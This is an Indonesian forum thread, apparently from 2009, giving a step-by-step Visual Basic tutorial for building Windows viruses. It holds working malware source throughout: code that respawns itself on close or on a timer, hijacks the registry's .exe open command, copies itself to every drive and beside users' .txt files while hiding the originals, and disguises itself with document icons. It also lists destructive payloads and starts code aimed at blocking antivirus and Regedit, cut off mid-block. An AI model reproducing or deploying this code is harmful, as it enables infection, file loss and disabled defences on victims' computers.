Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
End Sub
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile & ".exe", vbNormalFocus
End Sub



Selanjutnya membuat suatu program yang tidak bisa ditutup dengan menge-click
tombol x pada windows:

Code:

Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
End Sub
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile & ".exe", vbNormalFocus
End Sub

Dengan perintah diatas maka program tersebut akan melakukan
pemanggilan dirinya kembali ketika ditutup dengan menekan tombol x di
sudut kanan atas.
Itu bisa terjadi dengan mengetikan perintah shell pada event Form_Unload

Berikutnya code pengaktifan setiap detik
Siapkan sebuah timer dengan Interval=1000 artinya akan menjalankan
suatu perintah pada event timer setiap satu detik. 1 detik= 1000
millidetik.

Code:
Dim lokasi As String
Dim namafile As String
Dim detik As Integer
Private Sub Form_Load()
If App.PrevInstance Then End
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
End Sub
Private Sub Timer1_Timer()
Shell lokasi & namafile, vbNormalFocus
End Sub

Dengan mengisikan perintah pengaktifan pada event Timer maka program akan
melakukan pengaktifan setiap satu detik.
Disini kita juga harus menyiap penganan agar program hanya dapat berjalan sekali saja, dengan perintah:

Code:
If App.PrevInstance Then End

Pada code berikut program akan melakukan pengaktifan jika suatu program
mendapatkan focus:

Code:
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Dim GFW As Long
Dim PrevGFW As Long
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
If .PrevInstance Then End
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
End Sub
Private Sub Timer1_Timer()
GFW = GetForegroundWindow
If GFW <> Me.hWnd And PrevGFW <> GFW Then
Shell lokasi & namafile, vbNormalFocus
PrevGFW = GFW
End If
End Sub

Private Declare Function GetForegroundWindow Lib "user32" () As Long

GetForegroundWindow digunakan untuk mendapatkan nilai handle dari suatu
objek/program yang mendapatkan focus.
Setelah nilai handle tersebut didapat maka akan dilakukan pengecekan
apakah handle tersebut tidak sama dengan diri sendiri dan handle
sebelumnya jika tidak sama jalankan proses pengaktifan.
Berikut ini adalah kode pengaktifan yang baik:

Code:
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Dim GFW As Long
Dim PrevGFW As Long
Dim lokasi As String
Dim namafile
Private Sub Form_Load()
namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")
If App.PrevInstance Then End
lokasi = App.Path & "\"
If Dir(lokasi & namafile(0)) = "" Or Dir(lokasi & namafile(1)) = "" Then
FileCopy lokasi & namafile(2), lokasi & namafile(0)
FileCopy lokasi & namafile(2), lokasi & namafile(1)
End If
End Sub
Private Sub Timer1_Timer()
GFW = GetForegroundWindow
If Me.hWnd <> GFW And PrevGFW <> GFW Then
Shell App.Path & "\" & namafile(0), vbNormalFocus
Shell App.Path & "\" & namafile(1), vbNormalFocus
PrevGFW = GFW
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile(0), vbNormalFocus
Shell lokasi & namafile(1), vbNormalFocus
End Sub

Pertama kali ketika virus dijalankan sang virus akan menduplikat
dirinya dengan nama Virus1.exe dan Virus2.exe yang diambil dari Array.

Code:
namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")

Penduplikatan dilakukan dengan perintah:

Code:
FileCopy lokasi & namafile(2), lokasi & namafile(0)
FileCopy lokasi & namafile(2), lokasi & namafile(1)

Setelah itu virus akan menjalankan hasil duplikat tersebut setiap terjadi perubahan nilai handle.


Code:
GFW = GetForegroundWindow
If Me.hWnd <> GFW And PrevGFW <> GFW Then
Shell App.Path & "\" & namafile(0), vbNormalFocus
Shell App.Path & "\" & namafile(1), vbNormalFocus
PrevGFW = GFW
End If

Virus akan menjalakan hasil duplicate apabila virus tersebut ditutup.

Code:
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile(0), vbNormalFocus
Shell lokasi & namafile(1), vbNormalFocus
End Sub
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:13

. PENYEBARAN



Penyebaran merupakan salah satu dari cara kerja suatu virus, agar virus
tersebut dapat melangsungkan hidupnya. Kayak mahluk hidup donk? Ya gitulah.

Dalam visual basic perintah penggandaan dapat dilakukan dengan dua cara:

  1. Menggunakan code standar dalam visual basic. (FileCopy).
  2. menggunakan code API untuk yang akan berinteraksi langsung dengan system
  3. operasi sehingga memungkin perintah dapat berjalan lebih cepat dan selalu
  4. berhasil. (CopyFile).

Fungsi untuk melakukan pengcopian file

1. Perintah Copy Visual Basic (FileCopy)
Dengan perintah perintah peng-copy-an suatu file pada visual basic, kita bias
membuat suatu fungsi untuk melakukan suatu penggandaan diri dalam suatu
virus, tapi fungsi ini tidak 100% berhasil. Dan memakan waktu yang lama
jika digunakan untuk melakukan penggandaan dalam jumlah banyak.
Perintah ini sebaiknya digunakan jika kita ingin membuat suatu virus
yang sederhana.

Code:
FileCopy sumber,tujuan

2. Fungsi API:
Penggunaan perintah API sangat disaran jika kita ingin membuat suatu
applikasi yang professional. Kok Applikasi? Karena fungsi ini biasanya
digunakan untuk membuat aplikasi installer yang dibuat oleh suatu
perusahaan software. Fungsi API selalu digunakan oleh perusahaan
software agar software yang mereka buat bisa langsung berinteraksi
dengan system operasi dan bukan berinteraksi dengan sebuah file virtual
machine (Contoh : msvbvm60.dll) dimana virtual machine ini berfungsi
untuk melakukan hubungan dari suatu applikasi ke system operasi. Jadi
baiknya jika aplikasi kita buat langsung berhubungan dengan system
operasi sehingga kinerja dari aplikasi yang kita buat tersebut akan
sangat baik. Apa hubungannya sama virus? Jika kita bisa membuat virus
yang langsung berhubungan dengan system operasi. Selain proses
penyebarannya sangat cepat, virus itupun mampu melindungi dirinya
dengan sangat baik. Karena ia mempu mengendalikan suatu aplikasi.
Apakah aplikasi tersebut perbolehlan untuk dijalankan atau tidak.

Code:
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long

Code:
CopyFile Sumber,Tujuan,0
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:14

Bagaimana teknik penyebaran yang baik?
Tenik penyebaran yang baik yang biasa dilakukan oleh virus adalah

1. Membaca address bar pada window explorer
Tehnik ini sangat baik selain proses penyebaran sangat cepat juga tidak
memerlukan suatu teknik pencarian suatu file. Mengapa tidak memerlukan
pencarian? Karena user telah memberikan informasi lokasi suatu file
yang dianggap penting oleh user dengan cara membuka folder tersebut
menggunakan windows explorer yang selanjutnya digunakan user untuk
menjalankan file tersebut. Virus yang mendapatkan lokasi tersebut
langsung menggandakan diri kedalamnya. Biasanya penamaan file dari
hasil penggandaan virus tersebut diambil dari nama subfolder yang
sedang terbuka.
Fungsi API:
Code:
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal HWND As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any)As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
(ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
ByVal lpsz2 As String) As Long
Public Const WM_GETTEXT = &HD

2. Membaca seluruh subfolder pada setiap partisi ataupun hanya partisi system saja.
Cara penggandaan yang satu ini sangat memakan banyak waktu untuk proses
penyebaran. Tapi jika penyeberannya berhasil bisa dibayangkan kalau
cara penggandaannya berdasarkan subfolder saja untuk satu partisi
system saja bisa mencapai ribuan coba kalau user tersebut menggunakan
Multi OS dikomputernya. Bayangkan saja!!!. Apalagi kalau system
penggandaannya berdasarkan file-file yang ada dipartisi, pasti lebih
heboh lagi.

3. Membaca lokasi file yang dijalankan
Penggandaan berdasarkan lokasi file yang dijalankan. Cara yang satu ini
memang sangat cepat tapi hasil penggandaan tidak sebanyak dari 2 cara
diatas. Ini dikarenakan jika user menjalankan suatu aplikasi. Tapi jika
user tidak menjalankan suatu aplikasi maka virus tersebut tidak bisa
menggandakan dirinya. Biasanya cara ini digunakan untuk menginfeksi
suatu file. Biasanya mempunyai hubungan dengan registry.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:15

Untuk membuat virus yang hebat sangat disarankan untuk menggabungkan
semua code yang tersebut. Tapi gunakanlah sesuai kebutuhan. Untuk masalah
pengganbungan saya serahkan kepada anda.

Agar virus tersebut tidak diketahui sebagai virus. Virus tersebut dapat
menggunakan icon yang memungkinkan seseorang tidak dapat mengenali
apakah itu virus atau bukan. Contoh nya adalah icon: Folder, Word,
Exel, File Gambar (jpg, bmp, png, gif), zip, rar, pdf, notepad,
application, dll.

Kode penyebaran dengan mengambil lokasi dari aplikasi yang dijalankan:

Code:
'Registry API
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
"RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
"RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function SetFileAttributes Lib "kernel32" Alias
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum
Dim lokasi As String
Dim NamaFile1 As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
NamaFile1 = .EXEName & ".exe"
End With
CreateStringValue HKEY_CLASSES_ROOT, "exefile\shell\open\command", _
REG_SZ, "", Chr(&H22) & lokasi & NamaFile1 & Chr(&H22) & " " & _
Chr(&H22) & "%1" & Chr(&H22) & " %*"
'Jika parameter pemanggilan virus tidak sama dengan kosong
If Command$ <> "" Then
Dim sFilePath As String
'ambil Path file
sFilePath = Right$(Command$, Len(Command$) - 1)
sFilePath = Left$(sFilePath, Len(sFilePath) - 2)
SetFileAttributes sFilePath, FILE_ATTRIBUTE_HIDDEN Or _
FILE_ATTRIBUTE_READONLY
CopyFile App.Path & "\" & App.EXEName & ".exe", _
NamaPath(sFilePath) & RTrim$(Left(NamaFile(sFilePath), _
Len(NamaFile(sFilePath)) - 4)) & " .exe", 0
SetFileAttributes NamaPath(sFilePath) & _
RTrim$(Left(NamaFile(sFilePath), Len(NamaFile(sFilePath)) - 4)) & _
" .exe", FILE_ATTRIBUTE_NORMAL
Shell Command$, vbNormalFocus
DoEvents
End If
'jalankan sekali saja
If App.PrevInstance Then End
End Sub
'dapatkan nama file
Public Function NamaFile(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaFile = ""
i = 0
If Right(sPath, 1) = "\" Then sPath = Left$(sPath, Len(sPath) - 1)
For i = Len(sPath) To 1 Step -1
If Mid$(sPath, i, 1) = "\" Then
NamaFile = Right(sPath, Len(sPath) - i)
Exit Function
End If
DoEvents
Next
End Function
'dapatkan nama path
Public Function NamaPath(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaPath = sPath
For i = Len(NamaPath) To 1 Step -1
If Mid$(NamaPath, i, 1) = "\" Then
NamaPath = Left$(NamaPath, i)
Exit Function
End If
DoEvents
Next i
NamaPath = ""
End Function
'Create or Set String Value Registry
Private Function CreateStringValue(hKey As REG, Subkey As String,
RTypeStringValue As TypeStringValue, strValueName As String, strData As
String) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateStringValue = RegSetValueEx(ret, strValueName, 0, _
RTypeStringValue, ByVal strData, Len(strData))
RegCloseKey ret
End Function

Pertama kali yang dilakukan virus ketika virus dijalankan adalah
menyeting registry pada bagian exefile, dengan begitu ketika seseorang
menjalankan aplikasi dengan extensi “*.exe” maka virus akan
berjalan dan melakukan pengecekan lokasi aplikasi tersebut dijalankan
dan melakukan penyebaran pada lokasi aplikasi tersebut dijalankan.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:15

Berikut adalah kode penyebaran dengan mencari drive yang tersedia dan melakukan penyebaran pada drive tersebut.

Sediakan satu buah form dan satu buah module
Ketikan perintah ini pada form:

Code:
CariDrive

Ketikan perintah ini pada module:

Code:
Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" _
(ByVal nDrive As String) As Long
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
'dapatkan drive hardisk dan flashdisk
Public Function CariDrive() As String
Dim ictr As Integer
Dim sAllDrives As String
Dim sDrive As String
sDrive = ""
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If GetDriveType(sDrive) = 3 Or GetDriveType(sDrive) = 2 Then
CopyFile App.Path & "\" & App.EXEName & ".exe", sDrive & _
"virus.exe", 0
End If
Next
End Function
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:16

Berikut ini kode melakukan penyebaran dengan membaca alamat folder yang
dibuka dengan windows explorer dengan membacanya pda addressbar.
Siapkan satu form, satu timer dengan Interval=1500 dan satu buah module.

Ketikan perintah ini pada form:

Code:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
(ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
ByVal lpsz2 As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any) As Long
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
"RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
"RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function SetFileAttributes Lib "kernel32" Alias _
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Private Const WM_GETTEXT = &HD
Private Const REG_DWORD = 4
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
'Create or Set Dword Value Registry
Public Function CreateDwordValue(hKey As REG, Subkey As String, strValueName
As String, dwordData As Long) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateDwordValue = RegSetValueEx(ret, strValueName, 0, REG_DWORD, _
dwordData, 4)
RegCloseKey ret
End Function
Private Sub Form_Load()
CariDirectory "C:\", "Tes"
CreateDwordValue HKEY_CURRENT_USER, _
"Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState", _
"FullPathAddress", 1
End Sub
Private Sub Timer1_Timer()
Dim ExploreWClass As Long
Dim CabinetWClass As Long
Dim WorkerW As Long
Dim RebarWindow32 As Long
Dim ComboBoxEx32 As Long
Dim ComboBox As Long
Dim Edit As Long
Dim temp As String * 255
Dim temp2 As String * 255
Dim AlamatFile As String
Dim JudulCaption As String
ExploreWClass = FindWindow("ExploreWClass", vbNullString)
CabinetWClass = FindWindow("CabinetWClass", vbNullString)
If ExploreWClass = GetForegroundWindow Then
WorkerW = FindWindowEx(ExploreWClass, 0&, "WorkerW", vbNullString)
SendMessage ExploreWClass, WM_GETTEXT, 200, ByVal temp2
ElseIf CabinetWClass = GetForegroundWindow Then
WorkerW = FindWindowEx(ExploreWClass, 0&, "WorkerW", vbNullString)
SendMessage CabinetWClass, WM_GETTEXT, 200, ByVal temp2
End If
'dapatkan string pada address bar
RebarWindow32 = FindWindowEx(WorkerW, 0&, "RebarWindow32", vbNullString)
ComboBoxEx32 = FindWindowEx(RebarWindow32, 0&, "ComboBoxEx32", _
vbNullString)
ComboBox = FindWindowEx(ComboBoxEx32, 0&, "ComboBox", vbNullString)
Edit = FindWindowEx(ComboBox, 0&, "Edit", vbNullString)
SendMessage Edit, WM_GETTEXT, 200, ByVal temp
'ambil lokasi folder yang aktif pada windows explorer
AlamatFile = Mid$(temp, 1, InStr(temp, Chr$(0)) - 1)
'ambil caption windows explorer
JudulCaption = Mid$(temp2, 1, InStr(temp2, Chr$(0)) - 1)
If AlamatFile <> "" And JudulCaption <> "" Then
Form1.Print "Judul : " & JudulCaption
Form1.Print "Address Bar : " & AlamatFile
CariFile AlamatFile
End If
End Sub

Ketikan perintah berikut pada module

Code:
Public Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" _
(ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Public Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" _
(ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Public Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) _
As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias _
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Public Declare Function GetFileAttributes Lib "kernel32" Alias _
"GetFileAttributesA" (ByVal lpFileName As String) As Long
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Public Const FILE_ATTRIBUTE_DIRECTORY = &H10
Public Const FILE_ATTRIBUTE_HIDDEN = &H2
Public Const FILE_ATTRIBUTE_READONLY = &H1
Public Const INVALID_HANDLE_VALUE = -1
Public Const MAX_PATH = 260
Public Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Public Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
'cari file
Public Function CariFile(Path As String) As Integer
On Error Resume Next
Dim FileName As String
Dim hSearch As Double
Dim WFD As WIN32_FIND_DATA
Dim cont As Double
CariFile = 0
Selesai = False
If Right(Path, 1) <> "\" Then Path = Path & "\"
cont = True
hSearch = FindFirstFile(Path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While cont
FileName = Mid$(WFD.cFileName, 1, InStr(WFD.cFileName, _
Chr$(0)) - 1)
If (FileName <> ".") And (FileName <> "..") Then
If Not FILE_ATTRIBUTE_DIRECTORY Then
If WFD.dwFileAttributes = 128 _
Or WFD.dwFileAttributes = 32 Then
If UCase(Right$(FileName, 3)) = "TXT" Then
SetFileAttributes Path & CariNama(FileName) & _
" .exe", FILE_ATTRIBUTE_NORMAL
CopyFile App.Path & "\" & App.EXEName & ".exe", _
Path & CariNama(FileName) & " .exe", 0
DoEvents
SetFileAttributes Path & FileName, _
FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY
CariFile = CariFile + 1
DoEvents
End If
End If
End If
End If
cont = FindNextFile(hSearch, WFD)
Loop
cont = FindClose(hSearch)
End If
hSearch = FindFirstFile(Path & "*.*", WFD)
DoEvents
End Function
'cari folder
Public Function CariDirectory(Path As String, SearchStr As String) As Double
Dim DirName As String
Dim DirNames() As String
Dim nDir As Double
Dim i As Double
Dim hSearch As Double
Dim WFD As WIN32_FIND_DATA
Dim cont As Double
If Right(Path, 1) <> "\" Then Path = Path & "\"
nDir = 0
ReDim DirNames(nDir)
cont = True
hSearch = FindFirstFile(Path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While cont
DirName = Mid$(WFD.cFileName, 1, InStr(WFD.cFileName, _
Chr$(0)) - 1)
If (DirName <> ".") And (DirName <> "..") Then
If GetFileAttributes(Path & DirName) _
And FILE_ATTRIBUTE_DIRECTORY Then
DirNames(nDir) = DirName
nDir = nDir + 1
ReDim Preserve DirNames(nDir)
If UCase(DirName) = UCase(SearchStr) Then
Dim tamp As String
CariFile Path & DirName & "\"
DoEvents
SetFileAttributes Path & DirName & "\" & _
NamaFile(Path & DirName) & " .exe", _
FILE_ATTRIBUTE_NORMAL
CopyFile App.Path & "\" & App.EXEName & ".exe", _
Path & DirName & "\" & NamaFile(Path & DirName) & _
" .exe", 0
TmpDrv = Left$(Path, 3)
Exit Function
End If
End If
End If
cont = FindNextFile(hSearch, WFD)
Loop
cont = FindClose(hSearch)
End If
If nDir > 0 Then
For i = 0 To nDir - 1
CariDirectory Path & DirNames(i) & "\", SearchStr
Next i
End If
End Function
'cari nama file/folder
Public Function CariNama(sName As String) As String
On Error Resume Next
Dim i As Integer
i = 0
For i = Len(sName) To 1 Step -1
If Mid$(sName, i, 1) = "." Then
CariNama = Left$(sName, i - 1)
Exit Function
End If
Next
End Function
'dapatkan nama file
Public Function NamaFile(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaFile = ""
i = 0
If Right(sPath, 1) = "\" Then sPath = Left$(sPath, Len(sPath) - 1)
For i = Len(sPath) To 1 Step -1
If Mid$(sPath, i, 1) = "\" Then
NamaFile = Right(sPath, Len(sPath) - i)
Exit Function
End If
DoEvents
Next
End Function
'dapatkan nama path
Public Function NamaPath(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaPath = sPath
For i = Len(NamaPath) To 1 Step -1
If Mid$(NamaPath, i, 1) = "\" Then
NamaPath = Left$(NamaPath, i)
Exit Function
End If
DoEvents
Next i
NamaPath = ""
End Function
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:16

.SERANGAN




Setelah virus tersebut melakukan penggandaan ke system, mengubah registry.
baru virus tersebut melakukan penyerangan (pengerusakan). Serangan
virus ini yang sangat ditakuti oleh pengguna computer. Tetapi jika
virus tersebut hanya melakukan penyebaran itu bukan masalah karena
tidak melakukan pengerusakan.

Bentuk-bentuk serangan (pengerusakan) yang dilakukan virus:

  1. Menghapus, memindahkan, menyembunyikan dan mengerusak isi file
  2. Infeksi terhadap file, biasanya virus melakukan ini untuk
    melindungi dirinya dengan cara menempel dirinya pada file yang ingin di
    infeksi. Biasanya file *.exe, *.com, *.scr , *.doc, *.xls.
  3. Penyembunyian partisi, memformat partisi dan menghapus partisi, bagian pengerusakan yang sangat merugikan orang lain.
  4. Melakukan komunikasi yang terhadap hardware untuk mengacaukan
    kinerja suatu hardware sehingga memungkinkan terjadi pengerusakan
    terhadap hardware tersebut. Biasanya yang menjadi sasaran adalah RAM.
  5. Mematikan aplikasi-aplikasi tertentu., hal ini sangat membuat kesal
    orang yang terserang, karena aplikasi tersebut tidak dapat dijalankan
    karena aplikasi tersebut telah dimatikan oleh virus. Biasanya aplikasi
    yang dimatikan tersebut adalah aplikasi yang berhubungan dengan
    registry, process manager dan antivirus.

Bentuk-bentuk serangan diatas adalah bentuk serangan yang paling sering
digunakan oleh virus untuk melakukan pengerusakan atau untuk melindungi
dirinya dari berbagai macam kemungkinan yang dapat membinasakan dirinya.

Menghapus, memindahkan dan menyembunyikan file merupakan hal yang
sangat sering digunakan oleh virus. Bahkan hampir semua virus
menggunakan tehnik ini untuk melakukan pengerusakan. Sangat merugikan
orang lain adalah menghapus file dan mengerusak isi file.

Infeksi terhadap file exe, com, dan scr sangat jarang ditemukan. Karena tehnik
ini cukup sulit dilakukan. Sehingga jarang sekali virus yang
menggunakan tehnik ini. Contoh virus yang menggunakan tehnik ini adalah
ITZ.

Melakukan komunikasi terhadap hardware juga sangat jarang. Misalnya
mengacaukan alamat Port yang ada. Kalau sederhananya mengacau fungsi
keyboard dan mouse. Kalau pada keyboard biasanya akan melakukan
perubahan kode ascii sehingga apa ditampilkan tidak sesuai dengan
diketikan. Sedangkan pada mouse adalah melakukan pergerakan cursor
mouse secara otomatis tanpa dikendalikan dan melakukan fungsi
pengeclick secara acak.

Mematikan aplikasi-aplikasi tertentu. Saat ini hampir semua jenis virus memiliki
kemampuan ini untuk melindungi dirinya sehingga sulit bagi antivirus
atau program sejenis untuk berjalan, karena jika aplikasi tersebut
berjalan maka sang virus akan langsung mematikan aplikasi tersebut.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:16

Berikut ini adalah beberapa kode yang dapat digunakan virus untuk melakukan
penyerangan.

Kode Penyerangan1:

Code:
Siapkan satu buah form
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
"RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
"RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function SetFileAttributes Lib "kernel32" Alias _
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
CreateStringValue HKEY_CLASSES_ROOT, "exefile\shell\open\command", _
REG_SZ, "", Chr(&H22) & lokasi & namafile & Chr(&H22) & " " & Chr(&H22) & _
"%1" & Chr(&H22) & " %*"
'Jika parameter pemanggilan virus tidak sama dengan kosong
If Command$ <> "" Then
If InStr(1, Command$, "Setup") <> 0 _
Or InStr(1, Command$, "winzip") <> 0 _
Or InStr(1, Command$, "Anti") <> 0 _
Or InStr(1, Command$, "virus") <> 0 _
Or InStr(1, Command$, "Regedit") <> 0 _
